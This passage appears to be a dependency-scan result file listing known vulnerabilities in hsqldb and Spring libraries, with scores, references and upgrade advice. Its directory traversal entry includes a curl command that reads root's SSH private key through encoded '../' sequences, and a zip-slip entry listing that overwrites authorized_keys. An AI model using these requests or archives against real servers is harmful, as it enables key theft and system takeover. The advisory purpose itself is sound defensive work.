"https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212%23c7", + "title": "Chromium Bugs" + }, + { + "url": "https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941", + "title": "GitHub Commit" + }, + { + "url": "http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html%23src_jrt_access_control", + "title": "Mitigation" + }, + { + "url": "https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java", + "title": "SVN Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:51:53.988304Z" + }, + { + "assigner": "Red Hat", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:53:59.414572Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:05:55.045961Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:53.988304Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:59.414572Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) when using `java.sql.Statement` or `java.sql.PreparedStatement` to process untrusted input. By default, it is allowed to call any static method of any Java class in the classpath resulting in code execution.\n\n## Workaround\nUsers who are unable to upgrade to the fixed version can set the system property `hsqldb.method_class_names` to classes which are allowed to be called. For example, `System.setProperty(\"hsqldb.method_class_names\", \"abc\")` or Java argument `-Dhsqldb.method_class_names=\"abc\"` can be used.\n## Remediation\nUpgrade `org.hsqldb:hsqldb` to version 2.7.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212#c7)\n- [GitHub Commit](https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941)\n- [Mitigation](http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html#src_jrt_access_control)\n- [SVN Commit](https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java)\n", + "epssDetails": { + "percentile": "0.85801", + "probability": "0.01274", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-41853" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-77xx-rxvh-q682" + ] + }, + "packageName": "org.hsqldb:hsqldb", + "proprietary": false, + "creationTime": "2022-10-07T07:26:42.276748Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-10-06T18:52:05Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hsqldb", + "artifactId": "hsqldb" + }, + "publicationTime": "2022-10-07T07:26:42.515068Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:59.414572Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hsqldb:hsqldb@2.3.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hsqldb:hsqldb", + "version": "2.3.2", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2329097", + "title": "Improper Output Neutralization for Logs", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "Dennis Kennedy" + ], + "semver": { + "vulnerable": [ + "[5.3.0,5.3.12)", + "[,5.2.18)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.3.12", + "5.2.18" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 4.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-core", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/346b75580267dc5d8d257be198d5841ce4e1add5", + "title": "Github Commit" + }, + { + "url": "https://pivotal.io/security/cve-2021-22096", + "title": "Pivotal Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:48:36.610042Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:53:48.086414Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:05:20.847607Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:36.610042Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:48.086414Z" + } + ], + "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Output Neutralization for Logs when a user provides malicious input, causing insertion of additional log entries.\n## Remediation\nUpgrade `org.springframework:spring-core` to version 5.3.12, 5.2.18 or higher.\n## References\n- [Github Commit](https://github.com/spring-projects/spring-framework/commit/346b75580267dc5d8d257be198d5841ce4e1add5)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22096)\n", + "epssDetails": { + "percentile": "0.34533", + "probability": "0.00079", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-22096" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.springframework:spring-core", + "proprietary": false, + "creationTime": "2022-01-02T11:14:46.053186Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2021-10-27T12:52:59Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-core" + }, + "publicationTime": "2021-10-27T16:55:13Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:48.086414Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.springframework:spring-core", + "version": "3.2.6.RELEASE", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2330878", + "title": "Improper Input Validation", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "psytester" + ], + "semver": { + "vulnerable": [ + "[,5.2.19.RELEASE)", + "[5.3.0,5.3.14)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.19.RELEASE", + "5.3.14" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 4.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-core", + "references": [ + { + "url": "https://pivotal.io/security/cve-2021-22060", + "title": "Pivotal Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:48:34.544783Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:49:10.667113Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:24.703024Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:34.544783Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:10.667113Z" + } + ], + "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Input Validation when a user provides malicious input, causing insertion of additional log entries.\n## Remediation\nUpgrade `org.springframework:spring-core` to version 5.2.19.RELEASE, 5.3.14 or higher.\n## References\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22060)\n", + "epssDetails": { + "percentile": "0.23203", + "probability": "0.00054", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-22060" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.springframework:spring-core", + "proprietary": false, + "creationTime": "2022-01-06T12:31:26.181234Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-01-06T11:18:34Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-core" + }, + "publicationTime": "2022-01-06T17:17:24.995166Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:10.667113Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.springframework:spring-core", + "version": "3.2.6.RELEASE", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-31325", + "title": "Directory Traversal", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "credit": [ + "Takeshi Terada" + ], + "semver": { + "vulnerable": [ + "[3.0.0.RELEASE, 3.2.9.RELEASE)", + "[4.0.0.RELEASE, 4.0.5.RELEASE)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "3.2.9.RELEASE", + "4.0.5.RELEASE" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[3.0.0.RELEASE, 3.2.9.RELEASE)", + "[4.0.0.RELEASE, 4.0.5.RELEASE)" + ], + "functionId": { + "filePath": "org/springframework/util/StringUtils.java", + "className": "StringUtils", + "functionName": "cleanPath" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-core", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/e3e71ba92a8b82dadf474eda76cd2741f65a77a8", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/f6fddeb6eb7da625fd711ab371ff16512f431e8d", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/16414", + "title": "GitHub Issue" + }, + { + "url": "https://jira.spring.io/browse/SPR-12354", + "title": "Jira Issue" + }, + { + "url": "http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000054.html", + "title": "JVNDB" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578", + "title": "NVD" + }, + { + "url": "https://pivotal.io/security/cve-2014-3578", + "title": "Pivotal Security" + }, + { + "url": "http://www.pivotal.io/security/cve-2014-3578", + "title": "Pivotal Security" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1131882", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:46:07.314890Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:25.325641Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:46:07.314890Z" + } + ], + "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Directory Traversal. It allows remote attackers to read arbitrary files via a crafted URL.\n\n## Details\n\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\n\nDirectory Traversal vulnerabilities can be generally divided into two types:\n\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\n\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). In our example, we will serve files from the `public` route.\n\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\n\n```\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\n```\n**Note** `%2e` is the URL encoded version of `.` (dot).\n\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. \n\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\n\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\n\n```\n2018-04-15 22:04:29 ..... 19 19 good.txt\n2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys\n```\n\n## Remediation\nUpgrade `org.springframework:spring-core` to version 3.2.9.RELEASE, 4.0.5.RELEASE or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/e3e71ba92a8b82dadf474eda76cd2741f65a77a8)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/f6fddeb6eb7da625fd711ab371ff16512f431e8d)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/16414)\n- [Jira Issue](https://jira.spring.io/browse/SPR-12354)\n- [JVNDB](http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000054.html)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578)\n- [Pivotal Security](https://pivotal.io/security/cve-2014-3578)\n- [Pivotal Security](http://www.pivotal.io/security/cve-2014-3578)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1131882)\n", + "epssDetails": { + "percentile": "0.69801", + "probability": "0.00301", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2014-3578" + ], + "CWE": [ + "CWE-22" + ] + }, + "packageName": "org.springframework:spring-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:31.465000Z", + "functions_new": [ + { + "version": [ + "[3.0.0.RELEASE, 3.2.9.RELEASE)", + "[4.0.0.RELEASE, 4.0.5.RELEASE)" + ], + "functionId": { + "className": "org.springframework.util.StringUtils", + "functionName": "cleanPath" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2014-09-05T17:16:58Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-core" + }, + "publicationTime": "2014-09-05T17:16:58Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:07.314890Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.springframework:spring-core", + "version": "3.2.6.RELEASE", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2434828", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "4ra1n" + ], + "semver": { + "vulnerable": [ + "[,5.2.20.RELEASE)", + "[5.3.0,5.3.17)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.20.RELEASE", + "5.3.17" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using Spring Expression Language (SpEL)" + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-expression", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/83ac65915871067c39a4fb255e0d484c785c0c11", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/28145", + "title": "GitHub Issue" + }, + { + "url": "https://pivotal.io/security/cve-2022-22950", + "title": "Pivotal Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:48:12.598178Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:47.044801Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:01.573408Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:12.598178Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:47.044801Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) by providing a specially crafted SpEL expression, that might result in an `OutOfMemoryError`.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.20.RELEASE, 5.3.17 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83ac65915871067c39a4fb255e0d484c785c0c11)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28145)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2022-22950)\n", + "epssDetails": { + "percentile": "0.35300", + "probability": "0.00081", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22950" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.springframework:spring-expression", + "proprietary": false, + "creationTime": "2022-03-29T10:05:31.971026Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-03-29T09:51:43Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-expression" + }, + "publicationTime": "2022-03-29T14:24:08Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:47.044801Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.springframework:spring-expression", + "version": "3.2.6.RELEASE", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-3369749", + "title": "Allocation of Resources Without Limits or Throttling", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Google OSS-Fuzz team" + ], + "semver": { + "vulnerable": [ + "[,5.2.23.RELEASE)", + "[5.3.0,5.3.26)", + "[6.0.0,6.0.7)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.23.RELEASE", + "5.3.26", + "6.0.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-expression", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/52c93b1c4b24d70de233a958e60e7c5822bd274f", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/935c29e3ddba5b19951e54f6685c70ed45d9cbe5", + "title": "GitHub Commit" + }, + { + "url": "https://spring.io/security/cve-2023-20861", + "title": "Vulnerability Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:53:04.052825Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:54:00.291695Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:22.626014Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:04.052825Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:00.291695Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via a crafted `SpEL` expression.\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.23.RELEASE, 5.3.26, 6.0.7 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/52c93b1c4b24d70de233a958e60e7c5822bd274f)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/935c29e3ddba5b19951e54f6685c70ed45d9cbe5)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-20861)\n", + "epssDetails": { + "percentile": "0.48906", + "probability": "0.00133", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-20861" + ], + "CWE": [ + "CWE-770" + ] + }, + "packageName": "org.springframework:spring-expression", + "proprietary": false, + "creationTime": "2023-03-23T12:26:39.837900Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-03-23T11:49:46Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-expression" + }, + "publicationTime": "2023-03-23T12:37:13.052190Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:00.291695Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.springframework:spring-expression", + "version": "3.2.6.RELEASE", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-5422217", + "title": "Allocation of Resources Without Limits or Throttling", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Google OSS-Fuzz Team" + ], + "semver": { + "vulnerable": [ + "[,5.2.24.RELEASE)", + "[5.3.0,5.3.27)", + 